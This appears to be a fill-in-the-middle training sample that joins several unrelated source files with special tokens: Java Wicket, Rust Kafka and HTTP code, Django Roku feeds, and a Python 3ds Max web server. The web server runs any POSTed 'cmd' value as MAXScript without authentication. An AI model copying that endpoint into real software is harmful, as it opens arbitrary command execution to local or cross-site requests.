import de.invesdwin.nowicket.application.auth.ABaseWebApplication;
import de.invesdwin.nowicket.application.filter.AWebApplication;
import de.invesdwin.nowicket.component.footer.AFooter;
@NotThreadSafe
public abstract class ABsgCoachWebPage extends AWebPage {
private static final boolean INVERTED_HEADER_AND_FOOTER = true;
private static final ResourceReference LOGO = new PackageResourceReference(ABsgCoachWebPage.class, "logo.png");
private static final PackageResourceReference BACKGROUND = new PackageResourceReference(ABsgCoachWebPage.class,
"bg.jpg");
public ABsgCoachWebPage(final IModel<?> model) {
super(model);
}
@Override
protected Navbar newNavbar(final String id) {
final Navbar navbar = super.newNavbar(id);
navbar.setBrandName(null);
navbar.setBrandImage(LOGO, Model.of("bsg-coach"));
navbar.addComponents(NavbarComponents.transform(Navbar.ComponentPosition.LEFT,
new NavbarButton<Void>(RedirectToGuidePage.class, Model.of("Home")).setIconType(GlyphIconType.home)));
navbar.addComponents(NavbarComponents.transform(Navbar.ComponentPosition.LEFT,
new NavbarButton<Void>(ABaseWebApplication.get().getHomePage(), Model.of("Get Feedback"))
.setIconType(GlyphIconType.upload)));
navbar.addComponents(NavbarComponents.transform(Navbar.ComponentPosition.RIGHT,
new NavbarExternalLink(Model.of("mailto:[email protected]"))
.setLabel(Model.of("Tell us what you think!")).setIconType(GlyphIconType.envelope)));
navbar.setInverted(INVERTED_HEADER_AND_FOOTER);
return navbar;
}
@Override
protected Class<? extends Page> getNavbarHomePage() {
return RedirectToGuidePage.class;
}
@Override
protected AFooter newFooter(final String id) {
return new FooterPanel(id);
}
@Override
public void renderHead(final IHeaderResponse response) {
super.renderHead(response);
final StringBuilder bgCss = new StringBuilder();
bgCss.append("body {\n");
bgCss.append(" background: url(");
bgCss.append(RequestCycle.get().urlFor(BACKGROUND, null));
bgCss.append(") no-repeat center center fixed;\n");
bgCss.append("}\n");
bgCss.append("nav {\n");
bgCss.append(" opacity: 0.75;\n");
bgCss.append("}\n");
bgCss.append(".footer .panel-footer {\n");
bgCss.append(" background-color: #222;\n");
bgCss.append(" border-color: #080808;\n");
bgCss.append(" opacity: 0.75;\n");
bgCss.append("}\n");
response.render(CssHeaderItem.forCSS(bgCss, "bsgBgCss"));
if (AWebApplication.get().usesDeploymentConfig()) {
//CHECKSTYLE:OFF fdate
response.render(JavaScriptHeaderItem
.forScript("(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){" //
+ "(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o)," //
+ "m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)" //
+ "})(window,document,'script','//www.google-analytics.com/analytics.js','ga');" //
+ "ga('create', 'UA-75774568-1', 'auto');" //
+ "ga('send', 'pageview');", "googleAnalytics"));
//CHECKSTYLE:ON
}
}
}<|fim▁end|>
| |
<|file_name|>io.rs<|end_file_name|><|fim▁begin|>extern crate hyper;
extern crate par;
use std::io::{self, Read};
use hyper::Client;
use hyper::header::{ContentLength, Connection, UserAgent};
use par::{Bar, Reader};
fn main() {
let client = Client::new();
let mut res = client.get("https://api.github.com/users/softprops/repos")
.header(Connection::close())
.header(UserAgent(String::from("par/0.1.0")))
.send().unwrap();<|fim▁hole|> if let Some(&ContentLength(len)) = res.headers.clone().get::<ContentLength>() {
let mut bar = Bar::new(len as usize);
bar.units = par::Units::Bytes;
let mut proxy = Reader::new(res, bar);
let mut buf = String::new();
proxy.read_to_string(&mut buf);
};
}<|fim▁end|>
| |
<|file_name|>simplewebserver.py<|end_file_name|><|fim▁begin|>import BaseHTTPServer
import cgi
import ctypes
import os
import sys
import threading
from PySide import QtGui
import MaxPlus
PORT = 8000
class MyThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.exiting = False
address = ('localhost', PORT)
self.server = BaseHTTPServer.HTTPServer(address, MyHandler)
self._stop = threading.Event()
def run(self):
self.server.serve_forever()
def stop(self):
self.server.server_close()
self.server.shutdown()
self._stop.set()
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
rootdir = os.path.join(os.path.dirname(__file__) + '/html')
try:
if self.path == '/':
self.path = '/index.html'
if self.path.endswith('.html'):
self.send_response(200)
self.send_header('Content-type','text-html')
self.end_headers()
f = open(rootdir + self.path)
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404, 'file not found')
def do_POST(self):
if self.path=="/cmd":
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
self.send_response(301)
self.send_header('Location', '/')
self.end_headers()
try:
MaxPlus.Core.EvalMAXScript(form["cmd"].value)
MaxPlus.ViewportManager_ForceCompleteRedraw()
except:
print "Needs to be run from a 3ds max instance"
return
class MyWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(MyWindow, self).__init__(parent)
self.setWindowTitle('Simple 3ds Max webserver')
self.resize(200,50)
self.btn_run = QtGui.QPushButton('Run')
layout = QtGui.QVBoxLayout()
layout.addWidget(self.btn_run)
self.setLayout(layout)
self.btn_run.clicked.connect(self.run)
self.serverThread = None
def run(self):
if not self.serverThread:
print "Serving at port", PORT
self.btn_run.setText('Stop...')
self.serverThread = MyThread()
self.serverThread.start()
else:
print "Stopping webserver"
self.btn_run.setText('Run')
self.serverThread.stop()
self.serverThread = None
def closeEvent(self, *args, **kwargs):
if self.serverThread:
print "Stopping webserver"
self.btn_run.setText('Run')
self.serverThread.stop()
self.serverThread = None<|fim▁hole|>class _GCProtector(object):
controls = []
if __name__ == '__main__':
app = QtGui.QApplication.instance()
if not app:
app = QtGui.QApplication([])
window = MyWindow()
_GCProtector.controls.append(window)
window.show()
capsule = window.effectiveWinId()
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
ptr = ctypes.pythonapi.PyCObject_AsVoidPtr(capsule)
MaxPlus.Win32.Set3dsMaxAsParentWindow(ptr)<|fim▁end|>
| |
<|file_name|>backends.py<|end_file_name|><|fim▁begin|>from django.contrib.auth.backends import ModelBackend
# Live sessions will still be using this backend for a while.
# TODO: Remove after there are no more sessions using this in prod.
class Sha256Backend(ModelBackend):
"""Overriding the Django model backend without changes."""
<|fim▁hole|><|fim▁end|>
|
pass
|
<|file_name|>base_consumer.rs<|end_file_name|><|fim▁begin|>//! Low-level consumers.
use std::cmp;
use std::ffi::CString;
use std::mem::ManuallyDrop;
use std::os::raw::c_void;
use std::ptr;
use std::sync::Arc;
use rdkafka_sys as rdsys;
use rdkafka_sys::types::*;
use crate::client::{Client, NativeClient, NativeQueue};
use crate::config::{
ClientConfig, FromClientConfig, FromClientConfigAndContext, NativeClientConfig,
};
use crate::consumer::{
CommitMode, Consumer, ConsumerContext, ConsumerGroupMetadata, DefaultConsumerContext,
RebalanceProtocol,
};
use crate::error::{IsError, KafkaError, KafkaResult};
use crate::groups::GroupList;
use crate::log::trace;
use crate::message::{BorrowedMessage, Message};
use crate::metadata::Metadata;
use crate::topic_partition_list::{Offset, TopicPartitionList};
use crate::util::{cstr_to_owned, NativePtr, Timeout};
pub(crate) unsafe extern "C" fn native_commit_cb<C: ConsumerContext>(
_conf: *mut RDKafka,
err: RDKafkaRespErr,
offsets: *mut RDKafkaTopicPartitionList,
opaque_ptr: *mut c_void,
) {
let context = &mut *(opaque_ptr as *mut C);
let commit_error = if err.is_error() {
Err(KafkaError::ConsumerCommit(err.into()))
} else {
Ok(())
};
if offsets.is_null() {
let tpl = TopicPartitionList::new();
context.commit_callback(commit_error, &tpl);
} else {
let tpl = ManuallyDrop::new(TopicPartitionList::from_ptr(offsets));
context.commit_callback(commit_error, &tpl);
}
}
/// Native rebalance callback. This callback will run on every rebalance, and it will call the
/// rebalance method defined in the current `Context`.
unsafe extern "C" fn native_rebalance_cb<C: ConsumerContext>(
rk: *mut RDKafka,
err: RDKafkaRespErr,
native_tpl: *mut RDKafkaTopicPartitionList,
opaque_ptr: *mut c_void,
) {
let context = &mut *(opaque_ptr as *mut C);
let native_client = ManuallyDrop::new(NativeClient::from_ptr(rk));
let mut tpl = ManuallyDrop::new(TopicPartitionList::from_ptr(native_tpl));
context.rebalance(&native_client, err, &mut tpl);
}
/// A low-level consumer that requires manual polling.
///
/// This consumer must be periodically polled to make progress on rebalancing,
/// callbacks and to receive messages.
pub struct BaseConsumer<C = DefaultConsumerContext>
where
C: ConsumerContext,
{
client: Client<C>,
main_queue_min_poll_interval: Timeout,
}
impl FromClientConfig for BaseConsumer {
fn from_config(config: &ClientConfig) -> KafkaResult<BaseConsumer> {
BaseConsumer::from_config_and_context(config, DefaultConsumerContext)
}
}
/// Creates a new `BaseConsumer` starting from a `ClientConfig`.
impl<C: ConsumerContext> FromClientConfigAndContext<C> for BaseConsumer<C> {
fn from_config_and_context(config: &ClientConfig, context: C) -> KafkaResult<BaseConsumer<C>> {
BaseConsumer::new(config, config.create_native_config()?, context)
}
}
impl<C> BaseConsumer<C>
where
C: ConsumerContext,
{
pub(crate) fn new(
config: &ClientConfig,
native_config: NativeClientConfig,
context: C,
) -> KafkaResult<BaseConsumer<C>> {
unsafe {
rdsys::rd_kafka_conf_set_rebalance_cb(
native_config.ptr(),
Some(native_rebalance_cb::<C>),
);
rdsys::rd_kafka_conf_set_offset_commit_cb(
native_config.ptr(),
Some(native_commit_cb::<C>),
);
}
let main_queue_min_poll_interval = context.main_queue_min_poll_interval();
let client = Client::new(
config,
native_config,
RDKafkaType::RD_KAFKA_CONSUMER,
context,
)?;
Ok(BaseConsumer {
client,
main_queue_min_poll_interval,
})
}
/// Polls the consumer for messages and returns a pointer to the native rdkafka-sys struct.
/// This method is for internal use only. Use poll instead.
pub(crate) fn poll_raw(&self, mut timeout: Timeout) -> Option<NativePtr<RDKafkaMessage>> {
loop {
unsafe { rdsys::rd_kafka_poll(self.client.native_ptr(), 0) };
let op_timeout = cmp::min(timeout, self.main_queue_min_poll_interval);
let message_ptr = unsafe {
NativePtr::from_ptr(rdsys::rd_kafka_consumer_poll(
self.client.native_ptr(),
op_timeout.as_millis(),
))
};
if let Some(message_ptr) = message_ptr {
break Some(message_ptr);
}
if op_timeout >= timeout {
break None;
}
timeout -= op_timeout;
}
}
/// Polls the consumer for new messages.
///
/// It won't block for more than the specified timeout. Use zero `Duration` for non-blocking
/// call. With no timeout it blocks until an event is received.
///
/// This method should be called at regular intervals, even if no message is expected,
/// to serve any queued callbacks waiting to be called. This is especially important for
/// automatic consumer rebalance, as the rebalance function will be executed by the thread
/// calling the poll() function.
///
/// # Lifetime
///
/// The returned message lives in the memory of the consumer and cannot outlive it.
pub fn poll<T: Into<Timeout>>(&self, timeout: T) -> Option<KafkaResult<BorrowedMessage<'_>>> {
self.poll_raw(timeout.into())
.map(|ptr| unsafe { BorrowedMessage::from_consumer(ptr, self) })
}
/// Returns an iterator over the available messages.
///
/// It repeatedly calls [`poll`](#method.poll) with no timeout.
///
/// Note that it's also possible to iterate over the consumer directly.
///
/// # Examples
///
/// All these are equivalent and will receive messages without timing out.
///<|fim▁hole|> /// # .create()
/// # .unwrap();
/// #
/// loop {
/// let message = consumer.poll(None);
/// // Handle the message
/// }
/// ```
///
/// ```rust,no_run
/// # let consumer: rdkafka::consumer::BaseConsumer<_> = rdkafka::ClientConfig::new()
/// # .create()
/// # .unwrap();
/// #
/// for message in consumer.iter() {
/// // Handle the message
/// }
/// ```
///
/// ```rust,no_run
/// # let consumer: rdkafka::consumer::BaseConsumer<_> = rdkafka::ClientConfig::new()
/// # .create()
/// # .unwrap();
/// #
/// for message in &consumer {
/// // Handle the message
/// }
/// ```
pub fn iter(&self) -> Iter<'_, C> {
Iter(self)
}
/// Splits messages for the specified partition into their own queue.
///
/// If the `topic` or `partition` is invalid, returns `None`.
///
/// After calling this method, newly-fetched messages for the specified
/// partition will be returned via [`PartitionQueue::poll`] rather than
/// [`BaseConsumer::poll`]. Note that there may be buffered messages for the
/// specified partition that will continue to be returned by
/// `BaseConsumer::poll`. For best results, call `split_partition_queue`
/// before the first call to `BaseConsumer::poll`.
///
/// You must continue to call `BaseConsumer::poll`, even if no messages are
/// expected, to serve callbacks.
///
/// Note that calling [`Consumer::assign`] will deactivate any existing
/// partition queues. You will need to call this method for every partition
/// that should be split after every call to `assign`.
///
/// Beware that this method is implemented for `&Arc<Self>`, not `&self`.
/// You will need to wrap your consumer in an `Arc` in order to call this
/// method. This design permits moving the partition queue to another thread
/// while ensuring the partition queue does not outlive the consumer.
pub fn split_partition_queue(
self: &Arc<Self>,
topic: &str,
partition: i32,
) -> Option<PartitionQueue<C>> {
let topic = match CString::new(topic) {
Ok(topic) => topic,
Err(_) => return None,
};
let queue = unsafe {
NativeQueue::from_ptr(rdsys::rd_kafka_queue_get_partition(
self.client.native_ptr(),
topic.as_ptr(),
partition,
))
};
queue.map(|queue| {
unsafe { rdsys::rd_kafka_queue_forward(queue.ptr(), ptr::null_mut()) }
PartitionQueue::new(self.clone(), queue)
})
}
}
impl<C> Consumer<C> for BaseConsumer<C>
where
C: ConsumerContext,
{
fn client(&self) -> &Client<C> {
&self.client
}
fn group_metadata(&self) -> Option<ConsumerGroupMetadata> {
let ptr = unsafe {
NativePtr::from_ptr(rdsys::rd_kafka_consumer_group_metadata(
self.client.native_ptr(),
))
}?;
Some(ConsumerGroupMetadata(ptr))
}
fn subscribe(&self, topics: &[&str]) -> KafkaResult<()> {
let mut tpl = TopicPartitionList::new();
for topic in topics {
tpl.add_topic_unassigned(topic);
}
let ret_code = unsafe { rdsys::rd_kafka_subscribe(self.client.native_ptr(), tpl.ptr()) };
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::Subscription(error));
};
Ok(())
}
fn unsubscribe(&self) {
unsafe { rdsys::rd_kafka_unsubscribe(self.client.native_ptr()) };
}
fn assign(&self, assignment: &TopicPartitionList) -> KafkaResult<()> {
let ret_code =
unsafe { rdsys::rd_kafka_assign(self.client.native_ptr(), assignment.ptr()) };
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::Subscription(error));
};
Ok(())
}
fn seek<T: Into<Timeout>>(
&self,
topic: &str,
partition: i32,
offset: Offset,
timeout: T,
) -> KafkaResult<()> {
let topic = self.client.native_topic(topic)?;
let ret_code = match offset.to_raw() {
Some(offset) => unsafe {
rdsys::rd_kafka_seek(topic.ptr(), partition, offset, timeout.into().as_millis())
},
None => return Err(KafkaError::Seek("Local: Unrepresentable offset".into())),
};
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::Seek(error));
};
Ok(())
}
fn commit(
&self,
topic_partition_list: &TopicPartitionList,
mode: CommitMode,
) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_commit(
self.client.native_ptr(),
topic_partition_list.ptr(),
mode as i32,
)
};
if error.is_error() {
Err(KafkaError::ConsumerCommit(error.into()))
} else {
Ok(())
}
}
fn commit_consumer_state(&self, mode: CommitMode) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_commit(self.client.native_ptr(), ptr::null_mut(), mode as i32)
};
if error.is_error() {
Err(KafkaError::ConsumerCommit(error.into()))
} else {
Ok(())
}
}
fn commit_message(&self, message: &BorrowedMessage<'_>, mode: CommitMode) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_commit_message(self.client.native_ptr(), message.ptr(), mode as i32)
};
if error.is_error() {
Err(KafkaError::ConsumerCommit(error.into()))
} else {
Ok(())
}
}
fn store_offset(&self, topic: &str, partition: i32, offset: i64) -> KafkaResult<()> {
let topic = self.client.native_topic(topic)?;
let error = unsafe { rdsys::rd_kafka_offset_store(topic.ptr(), partition, offset) };
if error.is_error() {
Err(KafkaError::StoreOffset(error.into()))
} else {
Ok(())
}
}
fn store_offset_from_message(&self, message: &BorrowedMessage<'_>) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_offset_store(message.topic_ptr(), message.partition(), message.offset())
};
if error.is_error() {
Err(KafkaError::StoreOffset(error.into()))
} else {
Ok(())
}
}
fn store_offsets(&self, tpl: &TopicPartitionList) -> KafkaResult<()> {
let error = unsafe { rdsys::rd_kafka_offsets_store(self.client.native_ptr(), tpl.ptr()) };
if error.is_error() {
Err(KafkaError::StoreOffset(error.into()))
} else {
Ok(())
}
}
fn subscription(&self) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let error = unsafe { rdsys::rd_kafka_subscription(self.client.native_ptr(), &mut tpl_ptr) };
if error.is_error() {
Err(KafkaError::MetadataFetch(error.into()))
} else {
Ok(unsafe { TopicPartitionList::from_ptr(tpl_ptr) })
}
}
fn assignment(&self) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let error = unsafe { rdsys::rd_kafka_assignment(self.client.native_ptr(), &mut tpl_ptr) };
if error.is_error() {
Err(KafkaError::MetadataFetch(error.into()))
} else {
Ok(unsafe { TopicPartitionList::from_ptr(tpl_ptr) })
}
}
fn committed<T: Into<Timeout>>(&self, timeout: T) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let assignment_error =
unsafe { rdsys::rd_kafka_assignment(self.client.native_ptr(), &mut tpl_ptr) };
if assignment_error.is_error() {
return Err(KafkaError::MetadataFetch(assignment_error.into()));
}
self.committed_offsets(unsafe { TopicPartitionList::from_ptr(tpl_ptr) }, timeout)
}
fn committed_offsets<T: Into<Timeout>>(
&self,
tpl: TopicPartitionList,
timeout: T,
) -> KafkaResult<TopicPartitionList> {
let committed_error = unsafe {
rdsys::rd_kafka_committed(
self.client.native_ptr(),
tpl.ptr(),
timeout.into().as_millis(),
)
};
if committed_error.is_error() {
Err(KafkaError::MetadataFetch(committed_error.into()))
} else {
Ok(tpl)
}
}
fn offsets_for_timestamp<T: Into<Timeout>>(
&self,
timestamp: i64,
timeout: T,
) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let assignment_error =
unsafe { rdsys::rd_kafka_assignment(self.client.native_ptr(), &mut tpl_ptr) };
if assignment_error.is_error() {
return Err(KafkaError::MetadataFetch(assignment_error.into()));
}
let mut tpl = unsafe { TopicPartitionList::from_ptr(tpl_ptr) };
// Set the timestamp we want in the offset field for every partition as
// librdkafka expects.
tpl.set_all_offsets(Offset::Offset(timestamp))?;
self.offsets_for_times(tpl, timeout)
}
// `timestamps` is a `TopicPartitionList` with timestamps instead of
// offsets.
fn offsets_for_times<T: Into<Timeout>>(
&self,
timestamps: TopicPartitionList,
timeout: T,
) -> KafkaResult<TopicPartitionList> {
// This call will then put the offset in the offset field of this topic
// partition list.
let offsets_for_times_error = unsafe {
rdsys::rd_kafka_offsets_for_times(
self.client.native_ptr(),
timestamps.ptr(),
timeout.into().as_millis(),
)
};
if offsets_for_times_error.is_error() {
Err(KafkaError::MetadataFetch(offsets_for_times_error.into()))
} else {
Ok(timestamps)
}
}
fn position(&self) -> KafkaResult<TopicPartitionList> {
let tpl = self.assignment()?;
let error = unsafe { rdsys::rd_kafka_position(self.client.native_ptr(), tpl.ptr()) };
if error.is_error() {
Err(KafkaError::MetadataFetch(error.into()))
} else {
Ok(tpl)
}
}
fn fetch_metadata<T: Into<Timeout>>(
&self,
topic: Option<&str>,
timeout: T,
) -> KafkaResult<Metadata> {
self.client.fetch_metadata(topic, timeout)
}
fn fetch_watermarks<T: Into<Timeout>>(
&self,
topic: &str,
partition: i32,
timeout: T,
) -> KafkaResult<(i64, i64)> {
self.client.fetch_watermarks(topic, partition, timeout)
}
fn fetch_group_list<T: Into<Timeout>>(
&self,
group: Option<&str>,
timeout: T,
) -> KafkaResult<GroupList> {
self.client.fetch_group_list(group, timeout)
}
fn pause(&self, partitions: &TopicPartitionList) -> KafkaResult<()> {
let ret_code =
unsafe { rdsys::rd_kafka_pause_partitions(self.client.native_ptr(), partitions.ptr()) };
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::PauseResume(error));
};
Ok(())
}
fn resume(&self, partitions: &TopicPartitionList) -> KafkaResult<()> {
let ret_code = unsafe {
rdsys::rd_kafka_resume_partitions(self.client.native_ptr(), partitions.ptr())
};
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::PauseResume(error));
};
Ok(())
}
fn rebalance_protocol(&self) -> RebalanceProtocol {
self.client.native_client().rebalance_protocol()
}
}
impl<C> Drop for BaseConsumer<C>
where
C: ConsumerContext,
{
fn drop(&mut self) {
trace!("Destroying consumer: {:?}", self.client.native_ptr()); // TODO: fix me (multiple executions ?)
unsafe { rdsys::rd_kafka_consumer_close(self.client.native_ptr()) };
trace!("Consumer destroyed: {:?}", self.client.native_ptr());
}
}
/// A convenience iterator over the messages in a [`BaseConsumer`].
///
/// Each call to [`Iter::next`] simply calls [`BaseConsumer::poll`] with an
/// infinite timeout.
pub struct Iter<'a, C>(&'a BaseConsumer<C>)
where
C: ConsumerContext;
impl<'a, C> Iterator for Iter<'a, C>
where
C: ConsumerContext,
{
type Item = KafkaResult<BorrowedMessage<'a>>;
fn next(&mut self) -> Option<Self::Item> {
loop {
if let Some(item) = self.0.poll(None) {
return Some(item);
}
}
}
}
impl<'a, C> IntoIterator for &'a BaseConsumer<C>
where
C: ConsumerContext,
{
type Item = KafkaResult<BorrowedMessage<'a>>;
type IntoIter = Iter<'a, C>;
fn into_iter(self) -> Self::IntoIter {
self.iter()
}
}
/// A message queue for a single partition.
pub struct PartitionQueue<C>
where
C: ConsumerContext,
{
consumer: Arc<BaseConsumer<C>>,
queue: NativeQueue,
nonempty_callback: Option<Box<Box<dyn Fn() + Send + Sync>>>,
}
impl<C> PartitionQueue<C>
where
C: ConsumerContext,
{
pub(crate) fn new(consumer: Arc<BaseConsumer<C>>, queue: NativeQueue) -> Self {
PartitionQueue {
consumer,
queue,
nonempty_callback: None,
}
}
/// Polls the partition for new messages.
///
/// The `timeout` parameter controls how long to block if no messages are
/// available.
///
/// Remember that you must also call [`BaseConsumer::poll`] on the
/// associated consumer regularly, even if no messages are expected, to
/// serve callbacks.
pub fn poll<T: Into<Timeout>>(&self, timeout: T) -> Option<KafkaResult<BorrowedMessage<'_>>> {
unsafe {
NativePtr::from_ptr(rdsys::rd_kafka_consume_queue(
self.queue.ptr(),
timeout.into().as_millis(),
))
}
.map(|ptr| unsafe { BorrowedMessage::from_consumer(ptr, &self.consumer) })
}
/// Sets a callback that will be invoked whenever the queue becomes
/// nonempty.
pub fn set_nonempty_callback<F>(&mut self, f: F)
where
F: Fn() + Send + Sync + 'static,
{
// SAFETY: we keep `F` alive until the next call to
// `rd_kafka_queue_cb_event_enable`. That might be the next call to
// `set_nonempty_callback` or it might be when the queue is dropped. The
// double indirection is required because `&dyn Fn` is a fat pointer.
unsafe extern "C" fn native_message_queue_nonempty_cb(
_: *mut RDKafka,
opaque_ptr: *mut c_void,
) {
let f = opaque_ptr as *const *const (dyn Fn() + Send + Sync);
(**f)();
}
let f: Box<Box<dyn Fn() + Send + Sync>> = Box::new(Box::new(f));
unsafe {
rdsys::rd_kafka_queue_cb_event_enable(
self.queue.ptr(),
Some(native_message_queue_nonempty_cb),
&*f as *const _ as *mut c_void,
)
}
self.nonempty_callback = Some(f);
}
}
impl<C> Drop for PartitionQueue<C>
where
C: ConsumerContext,
{
fn drop(&mut self) {
unsafe { rdsys::rd_kafka_queue_cb_event_enable(self.queue.ptr(), None, ptr::null_mut()) }
}
}<|fim▁end|>
|
/// ```rust,no_run
/// # let consumer: rdkafka::consumer::BaseConsumer<_> = rdkafka::ClientConfig::new()
|
<|file_name|>correlated_values.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
import uncertainties as U
from .. import asrootpy
__all__ = [
'as_ufloat',
'correlated_values',
]
def as_ufloat(roorealvar):
"""
Cast a `RooRealVar` to an `uncertainties.ufloat`
"""
if isinstance(roorealvar, (U.AffineScalarFunc, U.Variable)):
return roorealvar
return U.ufloat((roorealvar.getVal(), roorealvar.getError()))
def correlated_values(param_names, roofitresult):
"""
Return symbolic values from a `RooFitResult` taking into account covariance
This is useful for numerically computing the uncertainties for expressions
using correlated values arising from a fit.
Parameters
----------
param_names: list of strings
A list of parameters to extract from the result. The order of the names
is the order of the return value.
roofitresult : RooFitResult
A RooFitResult from a fit.
Returns
-------
list of correlated values from the uncertainties package.
Examples
--------
.. sourcecode:: python
# Fit a pdf to a histogram
pdf = some_roofit_pdf_with_variables("f(x, a, b, c)")
fitresult = pdf.fitTo(histogram, ROOT.RooFit.Save())
a, b, c = correlated_values(["a", "b", "c"], fitresult)
# Arbitrary math expression according to what the `uncertainties`
# package supports, automatically computes correct error propagation
sum_value = a + b + c
value, error = sum_value.nominal_value, sum_value.std_dev()
"""
pars = roofitresult.floatParsFinal()
#pars.Print()
pars = [pars[i] for i in range(pars.getSize())]<|fim▁hole|> parnames = [p.GetName() for p in pars]
values = [(p.getVal(), p.getError()) for p in pars]
#values = [as_ufloat(p) for p in pars]
matrix = asrootpy(roofitresult.correlationMatrix()).to_numpy()
uvalues = U.correlated_values_norm(values, matrix.tolist())
uvalues = dict((n, v) for n, v in zip(parnames, uvalues))
assert all(n in uvalues for n in parnames), (
"name {0} isn't in parameter list {1}".format(n, parnames))
# Return a tuple in the order it was asked for
return tuple(uvalues[n] for n in param_names)<|fim▁end|>
| |
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.contrib.sites.models import RequestSite
from django.shortcuts import render
from django.conf import settings
from django.db.models import Q
from django.core.urlresolvers import reverse<|fim▁hole|>from airmozilla.main.models import Channel, Event
from airmozilla.main.views import is_contributor
from airmozilla.base.utils import (
paginate
)
from airmozilla.main.context_processors import get_featured_events
def categories_feed(request):
context = {}
privacy_filter = {}
privacy_exclude = {}
if request.user.is_active:
if is_contributor(request.user):
# feed_privacy = 'contributors'
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
# else:
# feed_privacy = 'company'
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
# feed_privacy = 'public'
events = Event.objects.scheduled().approved()
live_events = Event.objects.live().approved()
if privacy_filter:
events = events.filter(**privacy_filter)
live_events = live_events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
live_events = live_events.exclude(**privacy_exclude)
channels = get_channels(events)
context['channels'] = channels
context['live_events'] = live_events
prefix = request.is_secure() and 'https' or 'http'
root_url = '%s://%s' % (prefix, RequestSite(request).domain)
def abs_url_maker(viewname, *args, **kwargs):
return root_url + reverse(viewname, args=args, kwargs=kwargs)
context['abs_url'] = abs_url_maker
context['get_media_info'] = get_media_info
response = render(request, 'roku/categories.xml', context)
response['Content-Type'] = 'text/xml'
return response
def get_channels(events, parent=None):
channels = []
channels_qs = Channel.objects.all()
if parent is None:
channels_qs = channels_qs.filter(parent__isnull=True)
else:
channels_qs = channels_qs.filter(parent=parent)
for channel in channels_qs:
event_count = events.filter(channels=channel).count()
subchannel_count = Channel.objects.filter(parent=channel).count()
if event_count or subchannel_count:
# channel.subchannels = get_channels(events, parent=channel)
channels.append(channel)
def sorter(x, y):
if x.slug == settings.DEFAULT_CHANNEL_SLUG:
return -2
return cmp(x.name.lower(), y.name.lower())
channels.sort(sorter)
return channels
def get_media_info(event):
if event.template and 'vid.ly' in event.template.name.lower():
tag = event.template_environment['tag']
return {
# 'url': 'http://vid.ly/%s?content=video&format=webm' % tag,
# 'format': 'webm'
# NOTE that it's deliberately set to the HTTP URL. Not HTTPS :(
'url': 'http://vid.ly/%s?content=video&format=mp4' % tag,
'format': 'mp4'
}
elif event.template and 'hls' in event.template.name.lower():
try:
file = event.template_environment['file']
wowzaapp = event.template_environment.get('wowzaapp') or 'Edgecast'
return {
# it's important to use HTTP here :(
'url': (
'http://wowza1.cdn.mozilla.net/%s/ngrp:%s_all'
'/playlist.m3u8' % (wowzaapp, file)
),
'format': 'hls',
}
except KeyError:
pass
return None
def event_feed(request, id):
# return a feed containing exactly only one event
context = {}
events = Event.objects.filter(id=id)
context['events'] = events
context['get_media_info'] = get_media_info
response = render(request, 'roku/channel.xml', context)
response['Content-Type'] = 'text/xml'
return response
def channel_feed(request, slug):
# this slug might be the slug of a parent
channels = Channel.objects.filter(
Q(slug=slug) |
Q(parent__slug=slug)
)
events = Event.objects.archived().approved()
events = events.filter(channels__in=channels)
privacy_filter = {}
privacy_exclude = {}
if request.user.is_active:
if is_contributor(request.user):
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
if privacy_filter:
events = events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
events = events.order_by('-start_time')
paged = paginate(events, 1, 100)
return render_channel_events(paged, request)
def trending_feed(request):
events = get_featured_events(
None, # across all channels
request.user,
length=settings.TRENDING_ROKU_COUNT,
)
return render_channel_events(events, request)
def render_channel_events(events, request):
context = {}
context['events'] = events
context['get_media_info'] = get_media_info
response = render(request, 'roku/channel.xml', context)
response['Content-Type'] = 'text/xml'
return response<|fim▁end|>
| |
<|file_name|>py_class_impl3.rs<|end_file_name|><|fim▁begin|>// Copyright (c) 2016-2021 Daniel Grunwald
//
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
